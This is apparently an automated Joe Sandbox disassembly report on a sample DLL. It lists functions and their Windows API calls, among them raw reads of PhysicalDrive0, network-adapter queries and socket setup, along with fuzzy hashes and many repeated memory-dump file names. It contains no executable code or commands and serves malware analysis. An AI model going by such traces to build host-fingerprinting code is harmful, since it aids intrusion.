Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a21f4a3b5d9224790280d36d852fb59480ff5ca14517a58d176ef691967c22
Instruction ID: 849b80410ec3ebff0240a6cb68fa5f7f583d20dd879c976475cdcdd6d6d513c7
Opcode Fuzzy Hash: 70a21f4a3b5d9224790280d36d852fb59480ff5ca14517a58d176ef691967c22
Instruction Fuzzy Hash: 0741B472609701AFE7008F64CA02BAA7BF8AF4536CF24091DF595A7AC0EF74D5098B91

Function 6CEC7F40 Relevance: 6.1, APIs: 4, Instructions: 62
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6CEC8003: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 6CEC8022
Part of subcall function 6CEC8003: DeviceIoControl.KERNELBASE(00000000,002D1400,98BADCFE,0000000C,?,00000400,?,00000000), ref: 6CEC8060
Part of subcall function 6CEC8003: GetLastError.KERNEL32 ref: 6CEC80C1
Part of subcall function 6CEC8003: CloseHandle.KERNELBASE(?), ref: 6CEC80F8

Part of subcall function 6CEC8107: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 6CEC811D
Part of subcall function 6CEC8107: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 6CEC8136
Part of subcall function 6CEC8107: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 6CEC815B
Part of subcall function 6CEC8107: FreeLibrary.KERNEL32(00000000), ref: 6CEC81E4

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,?), ref: 6CEC7F97
CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000,?,?,?), ref: 6CEC7FB9
GetFileTime.KERNEL32(00000000,?,00000000,00000000,?,?,?), ref: 6CEC7FCE
CloseHandle.KERNEL32(00000000,?,?,?), ref: 6CEC7FD7

Part of subcall function 6CEC7DDB: _memmove.LIBCMT ref: 6CEC7E99

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows_memmove
String ID:
API String ID: 1782583926-0
Opcode ID: 222f6cfe73c37d967e5ecaad4cde69b3c132fbcd2dbd0433c340a691d10046ae
Instruction ID: af1890d0b685a7552884519956ebcf6838ee83a1eb87138a246a77b01ee48db3
Opcode Fuzzy Hash: 222f6cfe73c37d967e5ecaad4cde69b3c132fbcd2dbd0433c340a691d10046ae
Instruction Fuzzy Hash: 6F11E1726093015BC610DE25CC84EDBBBFCAB89AA4F100A1DB4A593290DF70860DC7E3

Function 6CEB219A Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 6CEB219A
SetEvent.KERNEL32(00000000), ref: 6CEB21AE
SetEvent.KERNEL32(?), ref: 6CEB21C7
SleepEx.KERNELBASE(000000FF,00000001), ref: 6CEB21D1

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Event$H_prologSleep
String ID:
API String ID: 1765829285-0
Opcode ID: baffbff9f92698a917dcb8cae238513c90789242179eeffd54e92f1dbf76aef3
Instruction ID: 4b9e8b4499e3e66764b8cd46d56c9134c2ceb54e9cc471f5d6e2b7f5c4c51369
Opcode Fuzzy Hash: baffbff9f92698a917dcb8cae238513c90789242179eeffd54e92f1dbf76aef3
Instruction Fuzzy Hash: 23F03A36640150EFCB019FA4D888B98BBB0FF0D351F1482A9F9099B290CB399940DB60

Function 6CEB3DA2 Relevance: 4.6, APIs: 3, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 6CEB3DA7

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 27a89261805411ffd59873fec39c5fcddfb07443aad05fdce3371c83a01242f5
Instruction ID: d09e76041d62dd2fec277912c3a633308ef05aaf93e0958768411de458a229a1
Opcode Fuzzy Hash: 27a89261805411ffd59873fec39c5fcddfb07443aad05fdce3371c83a01242f5
Instruction Fuzzy Hash: CD416071604206DFCB08CF58D545BAABBB0FF09324F20855EF969AB780DB74E915CB91

Function 6CEB34DB Relevance: 4.5, APIs: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,?,?,6CEF14A0,?,6CEB3DEE,6CEB9E69,?,00000000,?,?,?,?,6CEBC89D,6CEF14A0), ref: 6CEB34E8
WSASocketA.WS2_32(6CEF14A0,?,00000000,00000000,00000000,00000001), ref: 6CEB34FD

Part of subcall function 6CEBE8BD: WSAGetLastError.WS2_32(00000000,?,?,?,6CEB3747,00000000), ref: 6CEBE8C8

setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 6CEB3528

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$Socketsetsockopt
String ID:
API String ID: 2093263913-0
Opcode ID: 85e36cbf6aaaaf3d7bbdcde1d69a4dc7ef5d164f4bc83e79c313af4cd7da9c2a
Instruction ID: 519313b0cd00b54ff81901b2074483e7ab51acff82cc305d8ec2e4c359d9eeb9
Opcode Fuzzy Hash: 85e36cbf6aaaaf3d7bbdcde1d69a4dc7ef5d164f4bc83e79c313af4cd7da9c2a
Instruction Fuzzy Hash: 51F0F472702214BBEB204AA5DD49FAA77BCDB097B5F200155F618AB2C0DF718C0083E0

Function 6CECA860 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON

Download Yara Rule

APIs

__beginthreadex.LIBCMT ref: 6CECA876
CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,6CEB4CE4), ref: 6CECA8A7
ResumeThread.KERNELBASE(?,00000000,?,?,?,?,?,6CEB4CE4), ref: 6CECA8B5

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CloseHandleResumeThread__beginthreadex
String ID:
API String ID: 1685284544-0
Opcode ID: 8afa16ec0fb56171596614736cf1bc919732e8ff7525d65b26f6b7ab8e95b850
Instruction ID: e194f94a27144a222b9fc1f0c13122163ef1aaae25fe94c4f68dd933092e1c32
Opcode Fuzzy Hash: 8afa16ec0fb56171596614736cf1bc919732e8ff7525d65b26f6b7ab8e95b850
Instruction Fuzzy Hash: F1F0AF72340201ABD7108E68CCC4F9173B8EF49329F34052AF565C7680C775A8939A90

Function 6CEB1DBD Relevance: 4.5, APIs: 3, Instructions: 31networkCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32 ref: 6CEB1DD0
WSAStartup.WS2_32(?,?), ref: 6CEB1DF4
InterlockedExchange.KERNEL32(?,00000000), ref: 6CEB1DFF

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Interlocked$ExchangeIncrementStartup
String ID:
API String ID: 1856147945-0
